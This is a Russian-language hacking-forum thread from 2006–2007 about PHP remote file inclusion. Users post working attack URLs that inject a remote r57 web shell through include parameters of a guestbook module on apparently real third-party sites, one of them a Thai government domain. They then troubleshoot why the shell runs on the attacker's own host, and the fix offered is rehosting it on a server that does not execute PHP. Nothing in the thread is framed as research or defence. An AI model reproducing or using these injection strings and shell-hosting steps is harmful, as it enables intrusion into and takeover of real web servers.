ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PHP-injection
  #1  
Старый 14.10.2006, 05:12
Аватар для banall
banall
Познающий
Регистрация: 25.06.2006
Сообщений: 55
Провел на форуме:
79099

Репутация: 0
По умолчанию PHP-injection

Кароче при запросе http://zhertva.com/index.php?page=http://site.ru/r57shell.txt

выдает
Warning: main(http:site.ru/r57shell.txt)

куда деваются слэши? Что делать?
 
Ответить с цитированием

  #2  
Старый 14.10.2006, 12:23
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

фильтры в скрипте стоят от таких как ты
 
Ответить с цитированием

  #3  
Старый 29.04.2007, 08:11
Аватар для of69
of69
Новичок
Регистрация: 02.06.2006
Сообщений: 20
Провел на форуме:
217292

Репутация: 13
Отправить сообщение для of69 с помощью ICQ
По умолчанию

народ чего за ботва, чёйто йа не фкуриваю

нашол пару сайтов вродебы с иньекциями

http://www.orfw.org/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=
http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=

там замудрёно заинклудил шелл - там в конце дописывается /styles//error.php
ну я создал у ся на сайте диру styles а в ней файл error.php кодом шелла ( r57 )

тоесть получилось так
http://мой_сайт/styles/error.php

заинклудил таким обраом

http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://мой_сайт/

норм шелл отображается, но показывает диру на МОЁМ сайтенге и отказывается что либо выполнять...

Обьясните плиззз что нетак я делаю и почему ничего неполучается, и как надо правельно?
 
Ответить с цитированием

  #4  
Старый 29.04.2007, 08:54
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

хмм.. у тебя лаги какие-то.
Код:
http://www.m-culture.go.th/nan/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://f4st.hotmail.ru
все норм.
 
Ответить с цитированием

  #5  
Старый 29.04.2007, 10:00
Аватар для of69
of69
Новичок
Регистрация: 02.06.2006
Сообщений: 20
Провел на форуме:
217292

Репутация: 13
Отправить сообщение для of69 с помощью ICQ
По умолчанию

перезалил на другой хост - терь всё работает, пасиб)
 
Ответить с цитированием

  #6  
Старый 29.04.2007, 10:19
Аватар для Digimortal
Digimortal
Banned
Регистрация: 22.08.2006
Сообщений: 608
Провел на форуме:
6144796

Репутация: 1095


По умолчанию

>> норм шелл отображается, но показывает диру на МОЁМ сайтенге и отказывается что либо выполнять...

может, потому что на твоем сайте php поддерживается? )
 
Ответить с цитированием

  #7  
Старый 29.04.2007, 11:09
Аватар для of69
of69
Новичок
Регистрация: 02.06.2006
Сообщений: 20
Провел на форуме:
217292

Репутация: 13
Отправить сообщение для of69 с помощью ICQ
По умолчанию

>>может, потому что на твоем сайте php поддерживается? )

ну... эээ...

/me ушол пить йат...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ